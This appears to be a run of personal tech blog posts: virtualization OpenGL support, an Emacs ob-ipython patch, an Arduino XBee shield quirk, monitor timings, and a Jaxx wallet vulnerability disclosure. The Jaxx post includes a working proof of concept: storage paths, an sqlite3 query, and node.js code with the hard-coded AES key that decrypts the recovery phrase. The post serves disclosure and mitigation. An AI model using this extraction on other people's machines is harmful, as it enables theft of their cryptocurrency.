If you want to run OpenGL 3.2+ apps in a Windows guest, AVOID Parallels 13 and buy VMWare Fusion 10 instead.

TL;DR: Parallels Desktop 13 only supports OpenGL 3.2 on an extremely limited subset of mostly games. VMWare Fusion 10 has full OpenGL 3.3 support. In my case, this made the difference between being able to work on a VTK-based client project (VMWare Fusion 👍👍) or NOT being able to work the project (Parallels 👎👎).

I bought a Parallels Desktop Pro 13 subscription to be able to do Linux and Windows development on my MacBook Pro.

Although PD is extremely well done otherwise, they seem to have been dragging their feet with rolling out full OpenGL 3.2 support, as can be seen in a number of threads on their forums, e.g. here, here and here.

For a client project, we are currently working on a cross-platform VTK-based app which targets Windows as its main platform. I was looking forward to using my Parallels Windows 10 guest to test the prototype out. Unfortunately, when trying to run a simple VTK sample I was greeted with this error message:

Warning: In ..\Rendering\OpenGL2\vtkOpenGLRenderWindow.cxx, line 647
vtkWin32OpenGLRenderWindow (0000018AAABA44B0): VTK is designed to work
with OpenGL version 3.2 but it appears it has been given a context
that does not support 3.2. VTK will run in a compatibility mode
designed to work with earlier versions of OpenGL but some features may
not work.

The app then reproducibly crashes hard.

Further investigation with the OpenGL Extension Viewer showed that there were three different OpenGL renderers: Two of them are OpenGL 2.1 capable, and one is 3.2 capable. However, as a user, you can’t decide which app gets which renderer.

Further digging, also with the glewinfo app, reveals that Parallels only very selectively supports certain games and apps. See the list at the end of this knowledge base article.

I logged a support issue re the VTK 7 and later OpenGL 3.2+ requirement. The bug was acknowledged, and Parallels confirmed that it was now on their backlog, but that they could give no indication of when this would be available.

Client projects really can’t wait for this, so based on good reviews of the OpenGL support in VMWare Fusion 10, I made use of their Cyber Monday special to purchase a license for the Pro version.

After installation, I imported the VM from Parallels Desktop:

… after which I was greeted with the VM configuration screen where I could configure the 3D support:

After which I could boot up the same Windows VM and run the VTK sample app without any issues whatsoever:

So there you go: If you need good OpenGL support in your VMs, prefer VMWare Fusion over Parallels Desktop.

Getting ob-ipython to show documentation during company completion.

ob-ipython is an Emacs package that enables org-babel to talk to a running ipython kernel. The upshot of this is that you can use org-mode instead of the jupyter notebook for interspersing executable code, results and documentation.

The screenshot from the ob-ipython github shows it in action: ob-ipython-github-screenshot.jpg

Personally, I would like to use this for controlling ipython kernels on remote GPU- and deep learning-capable Linux machines, all via Emacs on my laptop. The juyter notebook is really fantastic, but it’s not Emacs.

You could also use ein for this, but then you would have to give up org-mode.

As I was testing ob-ipython yesterday, I noticed that its company-backend (completion system for Emacs) doc-buffer support was absent. Usually, as you’re exploring possible code completions, you can press <f1> or C-h to show help on the currently highlighted completion candidate.

Fast-forward an hour or two of Emacs Lisp surgery, and I was able to hook up the ob-ipython company-mode backend to ob-ipython’s inspection facility. Now pressing C-h gets you detailed help in a company-documentation buffer!

Here is my github pull request, and here is a screenshot of the company-mode ob-ipython documentation in action:

ob-ipython-company-doc-buffer.png

Hopefully this will be merged soon so it can find its way onto the Melpa package archives.

Here’s a bonus screenshot showing the ob-ipython notes from my org-mode journal where you can see embedded Python code that has been executed via the connected ipython kernel, with the resultant SVG format plot embedded and displayed inline:

ob-ipython-notes-example-nov-2017-3.png

P.S. I am currently disabling elpy-mode when the ob-ipython minor mode is active, until I figure out a better solution to elpy interfering with ob-ipython.

(use-package ob-ipython
  :config
  ;; for now I am disabling elpy only ob-ipython minor mode
  ;; what we should actually do, is just to ensure that
  ;; ob-ipython's company backend comes before elpy's (TODO)
  (add-hook 'ob-ipython-mode-hookp
            (lambda ()
              (elpy-mode 0)
              (company-mode 1)))
  (add-to-list 'company-backends 'company-ob-ipython)
  (add-to-list 'org-latex-minted-langs '(ipython "python")))

The RobotDyn Joystick shield has the XBee TX / RX lines switched to D0 and D1 or completely disconnected

RobotDyn offers a well-manufactured Joystick and XBee shield for the Arduino Uno which I am currently using for some IEEE 802.15.4-related experiments.

However, as it is not mentioned in any official documentation, I want to document here that the XBee TX / RX lines are connected to the Arduino D1 and D0 lines respectively and can only be disconnected via the “USB sketch update / Wireless” hardware switch at the top left:

The D0 and D1 lines are of course also connected to the Arduino’s main serial interface and connection to the host computer. This is why the switch has to be on “USB sketch update” when you program the board.

Unfortunately, this also means that it won’t be possible to send debug output from the Arduino to the host machine’s serial monitor when the XBee is active, i.e. the switch is in “wireless” mode. This is especially problematic when writing and debugging new programmes that use the XBee radio module.

With the SparkFun XBee Shield, one can switch the mounted XBee to use either pins 0 and 1, or pins 2 and 3 (see the section named “UART/SoftwareSerial Switch”), neatly solving this problem. It would have been great if the RobotDyn unit had done something similar, but keeping cost under control probably played a role.

Driving the Dell U2713HM at 2650×1440 from the HDMI output of the HyperDrive USB-c dock with macOS SwitchResX

In a post from 2014, I showed how to drive the sub-standard HDMI input of the Dell U2713HM 27″ UltraSharp at a resolution of 2560×1440 from the HDMI 1.3 output of a Linux-running laptop.

Fast forward 3 years, and I found myself having to drive the exact same monitor at its native resolution via its (sub-standard) HDMI input from a 2017 MacBook Pro through the brilliant HyperDrive USB-C dock.

(Apple, USB-C is nice, but you really pushed it too far this time.)

Fortunately, using a shareware tool called SwitchResX and information from one of the comments on my previous post, this is possible.

Although one can import Linux ModeLine timings into SwitchResX, the previous timings refused to work. It looks like this is due to macOS refusing to apply monitor timings which exceed the EDID-reported maximum pixel clock of 170 MHz.

Fortunately, SwitchResX is able to generate new timings for reduced blanking (this is crucial to be able to drive this monitor at its full resolution in spite of its HDMI port technically not supporting this) given the resolution and the refresh rate.

Setting the refresh rate to 42 yields a pixel clock of 162 MHz. This screenshot shows you how:

43Hz was probably also possible, but 42 is the answer to life the universe and everything, so there’s that.

To be able to setup these custom timings, you have to disable System Integrity Protection temporarily by booting into the recovery partition.

Extracting the Jaxx 12-word wallet backup phrase.

Updates

Because this matter is still ongoing (Jaxx does not seem to want to fix this vulnerability), I have moved the updates here to the front. The original post is below.

2017-08-08 18:42 UTC

I have added the exact filesystem locations / paths to the relevant Jaxx local storage file to the demonstration section.

2017-06-20 07:51 UTC

Since the first publication of this post, Jaxx has publically stated several times that storing our wallets unsecurely is not a problem.

If that is indeed the case, why do all other reputable desktop wallets perform this encryption in the correct manner, thus safeguarding our wallets, and only Jaxx does not?

  • Desktop wallets that DO CORRECTLY ENCRYPT your wallet: Exodus, MyEtherWallet, geth, parity, electrum.
  • Desktop wallets that DO NOT CORRECTLY ENCRYPT your wallet: Jaxx.

(Jaxx “encrypts” the wallet seed, but with a hard-coded and easily extracted key, which means this is not encryption but rather obfuscation, which is not much better than no encryption.)

2017-06-13 10:14 UTC

Reader Imed reports in the comments below that the 4-digit user PIN is stored as an unsalted sha256 hash, which can easily be reversed using rainbow tables, for example via sites like CrackStation.

I have just confirmed with a test Jaxx installation that I am able to extract a configured PIN from the local storage database without Jaxx running of course.

2017-06-11 10:08 UTC

Daira Hopwood correctly points out in the comments that encrypting using the PIN would be too easily brute-forced. I have updated the post in two places to indicate that instead Jaxx does in fact need to implement support for a strong password. One can discuss whether to do this differently for the desktop (no sandboxing) than for mobile devices (usually good sandboxing).

2017-06-10 20:19 UTC

Based on this response by the Jaxx CTO on reddit, they are not planning to fix this vulnerability. If that is the case, I strongly recommend that you avoid the Jaxx wallet.

Introduction

I was curious how easy it would be to extract the 12-word wallet backup phrase from a Jaxx cryptocurrency wallet desktop app / chrome extension install.

After an hour or two of analysis, I can conclude that this is unfortunately far too easy.

jaxx-eth-screenie.png

Even when your Jaxx has a security PIN configured, anyone with 20 seconds of (network) access to your PC can extract your 12 word backup phrase and copy it down. Jaxx does not have to be running for this to happen.

With the 12 word backup phrase, they can later restore your wallet, including all of your private keys, on their own computers, and then proceed to transfer away all of your cryptocurrency.

The main problem is that the Jaxx software encrypts the mnemonic using a hard-coded encryption key, instead of making use of a strong user-supplied password. (As Daira Hopwood points out in the comments, using the PIN would not be sufficient.)

This means we can easily read and decrypt the full recovery phrase from local storage using sqlite3 and some straight-forward code.

I successfully tested this vulnerability on the Jaxx Chrome extension v1.2.17 and the Jaxx Linux desktop app 1.2.13.

Demonstration

To test this proof of concept, you will need node.js installed. Ensure that your Jaxx is PIN protected, just for fun. It won’t help.

On Linux or Mac, open the Jaxx local storage file using the sqlite3 tool, or if you prefer GUIs you can use sqlitebrowser. You can find this file at the following locations depending on your operating system, and whether you’re using the desktop app or the chrome extension:

  • Linux desktop: $HOME/.config/Jaxx/Local\ Storage/file__0.localstorage
  • Linux chrome extension: $HOME/.config/google-chrome/Default/Local Storage/chrome-extension_ancbofgphhmhcchnaognahmjfajaecmo_0.localstorage
  • macOS desktop: /Users/[username]/Library/Application Support/Jaxx/Local Storage/file__0.localstorage, thanks to Manuel in the comments;
  • Windows desktop: C:\Users\<Your Computer's User Name>\AppData\Roaming\Jaxx\Local Storage
  • Windows chrome extension: C:\Users\<Your Computer's User Name>\Local\Google\Chrome\User Data\Default\Local Storage\chrome-extension_ancbofgphhmhcchnaognahmjfajaecmo_0.localstorage

At the sqlite3 prompt, do the following:

sqlite> select value from ItemTable where key="mnemonic";
ofvoUNhkw+zBN+nvxd1GoL/u1Stn1hyXChD9JvCVkNZgpp19mWY595fbiFjjRPNbw5xxNtzAJGUchr3mImHCsLqSx7aQxcCbo+VrqxBJ5+4=

(If you opted for sqlitebrowser, just copy out the value of the mnemonic key.)

Note the returned value down. This is Jaxx’s encrypted mnemonic which we shall decrypt into your 12 word backup phrase.

(If the returned string is too short in your case, try sqlitebrowser instead. In my case, sqlite3 works perfectly for the desktop Jaxx, but not the Chrome Jaxx, where I use either the chrome Dev Tools or sqlitebrowser to extract the string.)

Install crypto-js version 3.1.2 by doing either npm install crypto-js@3.1.2 or yarn add crypto-js@3.1.2, and then run the following code using node, after substituting the mnemonicEncrypted variable value with the one you extracted using sqlite3:

// Jaxx recovery phrase extraction by cpbotha@vxlabs.com 2017
// https://vxlabs.com/2017/06/10/extracting-the-jaxx-12-word-wallet-backup-phrase/

// you need v3.1.2 (same as latest jaxx) else you'll get invalid UTF-8 error
var CryptoJS = require('crypto-js');
var _key = "6Le0DgMTAAAAANokdfEial"; //length=22
var _iv  = "mHGFxENnZLbienLyALoi.e"; //length=22

var mnemonicEncrypted="ofvoUNhkw+zBN+nvxd1GoL/u1Stn1hyXChD9JvCVkNZgpp19mWY595fbiFjjRPNbw5xxNtzAJGUchr3mImHCsLqSx7aQxcCbo+VrqxBJ5+4=";

var _keyB;
var _ivB;

// js/vault/vault.js
function decryptSimple(encryptedTxt) {
    // not sure why jaxx does  this inside the function
    _keyB = CryptoJS.enc.Base64.parse(_key);
    _ivB = CryptoJS.enc.Base64.parse(_iv);    
    var decrypted = CryptoJS.AES.decrypt(encryptedTxt, _keyB, { iv: _ivB });
    var decryptedText = decrypted.toString(CryptoJS.enc.Utf8);
    return decryptedText;
}

console.log(decryptSimple(mnemonicEncrypted));

This should print out your 12 word backup phrase, in the case of this dummy setup I’m seeing “snake purity emerge blue subway lab loyal timber depth leg federal work” which is indeed correct.

How can we fix this?

The thing is, Jaxx is unfortunately one of the better cross-platform multi-currency wallets. Although it has a great UI, I personally don’t like Exodus, because they don’t let me manage more than one Ethereum address.

To mitigate the Jaxx security issue discussed here, keep the Jaxx desktop app’s local storage directory on an encrypted filesystem which you only mount when you’re using Jaxx, and unmount directly afterwards. This is what I’m currently doing using encfs.

If you prefer using the Chrome extension, you can try symlinking just the extension’s local storage file as it lives in Chrome’s global Local Storage directory.

Importantly, keep on encouraging Jaxx support to add support for using a strong user-supplied password as part of the encryption key (just like Exodus) with which they encrypt your mnemonic (recovery phrase) and all other sensitive values in local storage. Refer them to this post for more details. (See Daira Hopwood’s comment, using the PIN for encryption is not sufficient.)

P.S.

If this helped you, and you like sending ethereum around, feel free to send some to address 0xA3448C2e3F22F58759fd5dD14BE76269034d440E also known as the following QR code:

screenshot_2017-11-28_17-57-19.png